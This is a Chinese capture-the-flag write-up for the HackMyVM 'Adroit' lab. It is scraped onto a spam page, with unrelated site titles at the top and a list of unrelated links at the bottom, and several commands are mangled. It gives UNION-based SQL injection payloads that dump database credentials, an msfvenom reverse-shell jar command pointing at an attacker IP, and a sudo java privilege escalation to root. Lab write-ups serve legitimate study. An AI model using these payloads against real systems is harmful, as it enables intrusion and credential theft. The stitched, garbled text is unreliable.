当前位置: 首页 > news >正文

鞍山建设局的网站网站技能培训班有哪些

news 2025/12/29 12:07:38
鞍山建设局的网站,网站技能培训班有哪些,柳市最好的网站建设公司,宝安附近做网站公司tags: HMVjava反编译SQL注入 1. 基本信息^toc 文章目录 1. 基本信息^toc2. 信息收集3. java反编译4. sql注入5. 解密密码6. 提权 靶机链接 https://hackmyvm.eu/machines/machine.php?vmAdroit 作者 alienum 难度 ⭐️⭐️⭐️⭐️️ 2. 信息收集 ┌──(root㉿kali)-[~] └… tags: HMVjava反编译SQL注入 1. 基本信息^toc 文章目录 1. 基本信息^toc2. 信息收集3. java反编译4. sql注入5. 解密密码6. 提权 靶机链接 https://hackmyvm.eu/machines/machine.php?vmAdroit 作者 alienum 难度 ⭐️⭐️⭐️⭐️️ 2. 信息收集 ┌──(root㉿kali)-[~] └─# fscan -h 192.168.80.11___ _/ _ \ ___ ___ _ __ __ _ ___| | __/ /_\/____/ __|/ __| __/ _ |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| \____/ |___/\___|_| \__,_|\___|_|\_\fscan version: 1.8.4 start infoscan 192.168.80.11:3306 open 192.168.80.11:3000 open 192.168.80.11:21 open 192.168.80.11:22 open [*] alive ports len is: 4 start vulscan [] ftp 192.168.80.11:21:anonymous[-]pub ftp ftp ls -a 229 Entering Extended Passive Mode (|||40570|) 150 Here comes the directory listing. drwxr-xr-x 2 ftp ftp 4096 Mar 19 2021 . drwxr-xr-x 3 ftp ftp 4096 Jan 14 2021 .. -rw-r--r-- 1 ftp ftp 5451 Jan 14 2021 adroitclient.jar -rw-r--r-- 1 ftp ftp 229 Mar 19 2021 note.txt -rw-r--r-- 1 ftp ftp 36430 Jan 14 2021 structure.PNG structrue.png 3. java反编译 获取到secret Sup3rS3cur3Dr0it 域名 adroit.local 用户名 zeus 域名 god.thunder.olympus 添加一个域名 adroit.local 尝试运行一下jar包 这里我用jdk8运行不了 切换到jdk11可以运行 提示输入账户密码 挨个测试即可 ┌──(root㉿kali)-[/home/kali/hmv/Adroit] └─# java -jar adroitclient.jar Enter the username : zeus Enter the password : Sup3rS3cur3Dr0it Wrong username or password ┌──(root㉿kali)-[/home/kali/hmv/Adroit] └─# java -jar adroitclient.jar Enter the username : zeus Enter the password : god.thunder.olympus Options [ post | get ] : get Enter the phrase identifier : 1 god.thunder.olympus 就是密码 4. sql注入 ┌──(root㉿kali)-[/home/kali/hmv/Adroit] └─# java -jar adroitclient.jar Enter the username : zeus Enter the password : god.thunder.olympus Options [ post | get ] : get Enter the phrase identifier :1 union select 1,database() -- - -- adroit1 union select 1,group_concat(table_name) FROM information_schema.tables WHERE table_schema adroit -- - -- ideas,users1 union select 1,group_concat(column_name) from information_schema.columns where table_name users -- - -- id,username,password,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS1 union select 1,group_concat(username,0x3a,password) from users -- - -- writer:l4AnpxSxDcYCl0mgxKr015OEC3aOfdrWafSqwpY获取到了账户密码 writer:l4AnpxSxDcYCl0mgxKr015OEC3aOfdrWafSqwpY 但是密码是加密的 但是加密的 5. 解密密码 解密的代码可以在jar包反编译中发现 密钥上面获取到了是 Sup3rS3cur3Dr0it 但是注意这里需要将0换成O 所以正确的密钥是 Sup3rS3cur3DrOit 参考 Mikannse的wp对这个进行解密 获取到密码是 just.write.my.ideas 6. 提权 利用账户密码登录 writer just.write.my.ideas ┌──(root㉿kali)-[/home/kali/hmv/Adroit] └─# ssh writer192.168.80.11 writer192.168.80.11s password: Linux adroit 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Thu Jan 14 23:14:06 2021 from 10.0.2.15 writeradroit:~$ id uid1000(writer) gid1000(writer) groups1000(writer),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth) writeradroit:~$ whoami writer writeradroit:~$ sudo -l [sudo] password for writer: Matching Defaults entries for writer on adroit:env_reset, mail_badpass, secure_path/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser writer may run the following commands on adroit:(root) /usr/bin/java -jar /tmp/testingmyapp.jar msf生成jar包 反弹shell msfvenom -p java/shell_reverse_tcp lhost192.168.80.5 lport4444 -f jar -o reverse.jarwriteradroit:/tmp$ cp reverse.jar /tmp/testingmyapp.jar writeradroit:/tmp$ sudo -u root java -jar /tmp/testingmyapp.jar[17:54:28] Welcome to pwncat ! __main__.py:164 [17:56:16] received connection from 192.168.80.11:51550 bind.py:84 [17:56:17] 0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957192.168.80.11:51550: registered new host w/ db manager.py:957 (local) pwncat$ (remote) rootadroit:/tmp# whoami root (remote) rootadroit:/root# ls root.txt (remote) rootadroit:/root# cat root.txt 017a030885f25af277dd891d0f151845 (remote) rootadroit:/root# cd /home/writer/ (remote) rootadroit:/home/writer# cat user.txt 61de3a25161dcb2b88b5119457690c3c (remote) rootadroit:/home/writer#我觉得这个靶场不算难。难点只是在分析java代码那里不过我看不懂java
http://www.w-s-a.com/news/447120/

相关文章:

  • asp网站建设教程如何在线上推广自己的产品
  • 电脑网站你懂我意思正能量济南网站建设公司熊掌号
  • 杂志社网站建设萧山区网站建设
  • 电商网站前端制作分工网站怎做百度代码统计
  • 免费的html大作业网站网站开发心得500字
  • 临时工找工作网站做美缝帮别人做非法网站
  • 深圳网站建设 设计创公司新昌网站开发
  • 唐山教育平台网站建设上海装修网官网
  • 一个公司做多个网站什么行业愿意做网站
  • 成都龙泉建设网站免费域名app官方下载
  • xss网站怎么搭建如何用wordpress站群
  • 怎样做网站外链supercell账号注册网站
  • 阿里巴巴网站是用什么技术做的哪些网站做推广比较好
  • 做网站go和python手机如何创网站
  • 网站开发进修网站做301将重定向到新域名
  • 公司网站开发费用账务处理ucenter wordpress
  • 六站合一的优势少儿编程机构
  • 软件开发与网站开发学做美食网站哪个好
  • 网站搜索 收录优化百度推广页面投放
  • 响应式网站的优点浙江省网站域名备案
  • 网站安全 扫描深圳被点名批评
  • 在哪个网站可以一对一做汉教网站优化策略
  • 龙岩做网站的顺企网宁波网站建设
  • 昆山网站建设河北连锁餐厅vi设计公司
  • 新蔡县住房和城乡建设局网站南昌租房网地宝网
  • 南宁做网站费用iis编辑网站绑定
  • 家用宽带做网站服务器建网站费用明细
  • 电商 网站 降低 跳出率 措施 效果书画院网站模板
  • 兰州移动官网网站建设上海工商网上公示系统
  • 在招聘网站里做电话销售免费空间可以上传网站吗